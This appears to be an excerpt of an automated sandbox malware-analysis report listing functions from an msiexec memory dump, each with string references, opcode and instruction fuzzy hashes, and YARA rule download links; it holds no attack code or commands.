Opcode Fuzzy Hash: 7e6d7e7e81119c43c92a175c3449193b3d680e7f5cf0329e8b4fdf76cb7d4c8d
Instruction Fuzzy Hash: 3A616B75E006189FEF25CFA8C880BAEBBB5FF58740F204469E658EB281D771E941CB50

Function 243BF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 243BF7F6
$, xrefs: 243BF860

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: 3c60c6cb83c7f89d0697a22b79f56e6ade8c8157bc6e96263460c57ba318021e
Instruction ID: 0a4184b1f953590fc469b8be938be7cf9f91d8dcb7ea0f0773dadaea39693b84
Opcode Fuzzy Hash: 3c60c6cb83c7f89d0697a22b79f56e6ade8c8157bc6e96263460c57ba318021e
Instruction Fuzzy Hash: 5061CF72A00B49DBEB21CFA4C580B9DBBF1FF54704F105469D596EBA84CB74AA41CB80

Function 243A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 243A0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 243A063D

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: adfcd013decd098c8835e157cb9ab765e31e3b32c97f2e55fa3ea6d240cb4782
Instruction ID: 9f8d6f7a37e1d40cb39a5005022d71c0bb28cfe335b129435e1c4efbd583e7b4
Opcode Fuzzy Hash: adfcd013decd098c8835e157cb9ab765e31e3b32c97f2e55fa3ea6d240cb4782
Instruction Fuzzy Hash: 6751AC716447528FE324DF64C4806A7BBF4EF89308F04883EEAEA97251E7349645CF92

Function 243D329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 243D32B5
@, xrefs: 243D330D

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: d6d9193c233915c000a0510bff6df9f70bd0de2b6ec30fe63766ad94ed52af58
Instruction ID: 0cd979d8c1ec58202e82136e5da231d927b1f082fb586732c67bb9e9743d79d9
Opcode Fuzzy Hash: d6d9193c233915c000a0510bff6df9f70bd0de2b6ec30fe63766ad94ed52af58
Instruction Fuzzy Hash: 26317EB3649705EFD311CF28C980A5FBBE8FF98694F40092EF99597250DA74DE048B92

Function 243D34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 24412A90
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 24412A95

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 402199d12f637c00da921da9df2b38f12def238bdd153792e3bd34c63518c34e
Instruction ID: 8863ff108f6f915a45dea924d79743db65aebb3b202c295279500e1e7ccefce4
Opcode Fuzzy Hash: 402199d12f637c00da921da9df2b38f12def238bdd153792e3bd34c63518c34e
Instruction Fuzzy Hash: 2511EC73701604FBEB258A898D81F6B77BDAB94B54F25806ABA04EB344D674CD0086A0

Function 243DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 243DA5E4
Threadpool!, xrefs: 243DA5E9

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 87e00fc3e8fd0654937f24c9885393b1a844a01c166ef1d034e5f1a7495ea348
Instruction ID: 80a40ae98f9ac97d19d9887fbffc7f1cb38d63049f3a0683d38366343d2293ef
Opcode Fuzzy Hash: 87e00fc3e8fd0654937f24c9885393b1a844a01c166ef1d034e5f1a7495ea348
Instruction Fuzzy Hash: 0E0186B3214644EFE311DF24CE45B2676E8EB54B15F00896AE658CB590EB78D804CB46

Function 243AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 243AC8C3, 243ACA40

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 405513e477c02df57cc418ead795401d2dc80da00fc866ab018c9dcc1e55fb1d
Instruction ID: 52a092a56c0412446b060a48547588d957644159edc86e6054888bfbdceedebf
Opcode Fuzzy Hash: 405513e477c02df57cc418ead795401d2dc80da00fc866ab018c9dcc1e55fb1d
Instruction Fuzzy Hash: C3825C75E402288FEB15CFA9C880BEDBBB6FF48350F108169E959AB295DB309D45CF50

Function 243CB2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

@[I$@[I$, xrefs: 243CB2DC

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @[I$@[I$
API String ID: 0-2537487192
Opcode ID: 240544d34ad729560ef4914da247248cb55451773acfef76eeaaf7174774691c
Instruction ID: da66a179b2dee75717006ceda443a1e7d153a11cf4abfd8c2edca7b5611c8518
Opcode Fuzzy Hash: 240544d34ad729560ef4914da247248cb55451773acfef76eeaaf7174774691c
Instruction Fuzzy Hash: FC328972E01219DBDB14CFA8E890BEEBBB5FF94714F244069E905AB381E7359D11CB90

Function 243A7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f1ea4d78c5843babfeea016b6d653eb52411fcb1f77aaf6713022ba6082146
Instruction ID: 0905fdea52262d0ff0a6d7d8a6956e4bb6a9dbf067473af65caeaf77779f1af4
Opcode Fuzzy Hash: 87f1ea4d78c5843babfeea016b6d653eb52411fcb1f77aaf6713022ba6082146
Instruction Fuzzy Hash: 66A16A71A08B51CFD315CF28C490A1ABBF9FF98704F24496EE5859B351EB30EA45CB92

Function 243DF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cb1b83f73476707968b6dd0316d04f192907080fb24c83d8dec324cf75fdd5
Instruction ID: e2e5c666c3d6843ebfd7d6ccc5acaca08dc84b1478b9a0f530f195289efa7494
Opcode Fuzzy Hash: 11cb1b83f73476707968b6dd0316d04f192907080fb24c83d8dec324cf75fdd5
Instruction Fuzzy Hash: 2A4148B6901688DFEB10CFA9C880AAEBBF4FF48704F10816EE459E7611DB709901DF60

Function 243DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 244167C9

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: fa48c123156d40f017cf1a37fb1b3abc5b74155921e6049c0ee27cfc2777543a
Instruction ID: c0e4022805726559e7fda2e9d3ab21184b4459decba2fac8b2fbc9d31ef7ae48
Opcode Fuzzy Hash: fa48c123156d40f017cf1a37fb1b3abc5b74155921e6049c0ee27cfc2777543a
Instruction Fuzzy Hash: 53716B75E0121ACFEF18CF98D990B9DBBB2BF58B10F14816EE919A7345DB319901CB60

Function 243A973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 243A97F3

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: 5a1d0a2fad1d2fc996918c75c76b0d8c684ede2ef523a9124e76bfc1e50ffeeb
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: 52615971E41629ABDF11CF95C844BAEBBB8FF84710F104669E924BB290D7749E00CB61

Function 2442F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 2442F867

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: b1dc9b1a63742b17e17cfdffe5ba9b1a47adb55a5c5967365f0bb0f50287c1fd
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 1D51DE72605B15AFEB12CF54C840F6BB7E8FF94754F800A29B6859B290D7B0ED04CB92

Function 243BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 243BE6A4

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: fba3d9ecd6e11f0545c0b10a35eb0d83f163d540c1e324979643cfc47e75daab
Instruction ID: 904bb133d6abd5ac86bf2e3cc8c7819caed558040c649f12661582ab1c290a26
Opcode Fuzzy Hash: fba3d9ecd6e11f0545c0b10a35eb0d83f163d540c1e324979643cfc47e75daab
Instruction Fuzzy Hash: 42419072609351ABE711CB79C882F6BB7E8AF98604F400A2DF9C4E7584E674D904C793

Function 2445B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 2445B28F

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 6e0aca8ea58e082b4cdbc59813ad01c39183686ae4a4e6d36ae4ad8678761572
Instruction ID: aceac73f418a178f4ba26de5c7f758874c846d271c71c1c21c34e530e65b4be9
Opcode Fuzzy Hash: 6e0aca8ea58e082b4cdbc59813ad01c39183686ae4a4e6d36ae4ad8678761572
Instruction Fuzzy Hash: A54194B2E01259ABDF11DF94C840FEEB7B9AF64750F010166E911B7364DA74EE40C7A0

Function 2441C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 2441C77F

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: c76631f3f7f906c526c30f963dace36fce0dfeae00b8e5b6f82766f9b89ce00b
Instruction ID: 6bfcdce8e829f8c86eb07fe521d3a2ddcf925de9b254993b6eebed94eb371720
Opcode Fuzzy Hash: c76631f3f7f906c526c30f963dace36fce0dfeae00b8e5b6f82766f9b89ce00b
Instruction Fuzzy Hash: 4B412EB2D0162CAEEF218A50CC80F9E777CAF54754F0045A5EA1CAB145DB709F898FA5

Function 243CA470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

@3I$, xrefs: 243CA5AD, 2440E1D3

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @3I$
API String ID: 0-2177223797
Opcode ID: 5ea928485a996a2b4d78c91ca6da4ef0e4eb3e20d95086faeb80540248d5cc1d
Instruction ID: 4ff5b3cbc56bbed8c2487f848a33457d5437c71de3a5ba12d6b93cf6f62358f1
Opcode Fuzzy Hash: 5ea928485a996a2b4d78c91ca6da4ef0e4eb3e20d95086faeb80540248d5cc1d
Instruction Fuzzy Hash: 3241BC32A44605CFEB05DF68C894BA97BB4FF28355F5082A5E411BB285DB38AD10DFA0

Function 244297A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 24429870

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 71ceb69d92e9953b2c26cc9a2e439fe922001c7c279b191c4795736b90b3c1a7
Instruction ID: 89c286f41926eef9403276445a0f710230f8de1ec708662fbb28547a0b7be2d1
Opcode Fuzzy Hash: 71ceb69d92e9953b2c26cc9a2e439fe922001c7c279b191c4795736b90b3c1a7
Instruction Fuzzy Hash: BC31C772710A019FDF15CF289850B26B7E5EB58314F68407AE648DF381EA318C80CB50

Function 2444705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 244470A4

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 0e49ead6c7320c1065d3455686810e7007ac7bb82a092b6b22037925fcb861cc
Instruction ID: 64966cf976fe71224dbe9826e5db350855dbe5156f5940e95738630975490a72
Opcode Fuzzy Hash: 0e49ead6c7320c1065d3455686810e7007ac7bb82a092b6b22037925fcb861cc
Instruction Fuzzy Hash: 0D4128719427914BFB11DB64C884F653FE0EB60F64F14065DFD50AA2CACF784886D7A1

Function 243D7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 24414622

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 2b181796d5fefb0ecd7a7ed8083984c85edb9745ad6d6847af7e87847235d5ed
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 13419D77A00A16EBDF128F44C890BBEB7B6FF84715F00449AE945AB244DB34D941CFA2

Function 243D36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 243D3731

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: eed96ee0aa28b34c33abaaa6b797b074d2609405cb800094d2471bdce38ff82c
Instruction ID: 4bd6b57461afd75b8181b856a062ee36fa1578b3b7396de6f7c21350f6de9c97
Opcode Fuzzy Hash: eed96ee0aa28b34c33abaaa6b797b074d2609405cb800094d2471bdce38ff82c
Instruction Fuzzy Hash: 2E4166B2605702DFD705CF18C480A16BBE4FF89710F1085AEE959DF241EBB1D946CB91

Function 24399730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

L4_wL4_w, xrefs: 243997A7

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: L4_wL4_w
API String ID: 0-4042522810
Opcode ID: d6c94a82aadeb3460c51ff8102efea6c27c94ca9dd67c61a26416055c0cfe94e
Instruction ID: 488322653e8f566fd66246b94e72250dbc73462f8f3c0c28eeb8b851b55e17ab
Opcode Fuzzy Hash: d6c94a82aadeb3460c51ff8102efea6c27c94ca9dd67c61a26416055c0cfe94e
Instruction Fuzzy Hash: 8021D476A01A10AFD3228F59C850B4A7FF9FF88B54F120469E6659B750DB70DC01CB90

Function 243DD530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

gI$, xrefs: 243DD5DF, 243DD5E3

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: gI$
API String ID: 0-2071972942
Opcode ID: b46d9fab0440d49cfdae065b4ca0fd9010439ef5f80076c31fec79bb4636ffc9
Instruction ID: 3ea5711df858d8c7dbb634137c9b63f1b45735b5fde2b87a093cf2b57d76e7e2
Opcode Fuzzy Hash: b46d9fab0440d49cfdae065b4ca0fd9010439ef5f80076c31fec79bb4636ffc9
Instruction Fuzzy Hash: 012123736083509BEB01DF64C944F077BE8AF65658F01081AFA489B658EB34DC00CBE1

Function 243A5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 243A50BF

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: ebd9bfdbb42084bb350e70707da4405bb7b4abe872b971f10d326d50eb4e05a5
Instruction ID: dc6d03b10c50a1b54b38b3a8f80f89be13376afa60645a98999070b9c0ab647d
Opcode Fuzzy Hash: ebd9bfdbb42084bb350e70707da4405bb7b4abe872b971f10d326d50eb4e05a5
Instruction Fuzzy Hash: 0911C8333C9A328BDB158E1DD850B2677D9EB91368F34817AE962CB391D675DC41C780

Function 2442106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 244210F7

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: f79dbe844262e97dfd8d6c5ce6e1a125a435a052e9b656ed3ae638de986865f1
Instruction ID: 5471601d987c74bb109f84db2be85aa5687c303d6c7170efc4eb26dbf06e86fe
Opcode Fuzzy Hash: f79dbe844262e97dfd8d6c5ce6e1a125a435a052e9b656ed3ae638de986865f1
Instruction Fuzzy Hash: 9021F3B15087449FD711CF2A8844A5BFBE8FBE9B10F004A1EF994A7254DBB0D804CB92

Function 244616CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50b7e22edd3f4615983e8575fd26a7f0c25f1b22507b4799dd8a33d7758c64c9
Instruction ID: 8c210c878c17708818fd72f751ec98a84072d019019794bd83e73cfd59deab3c
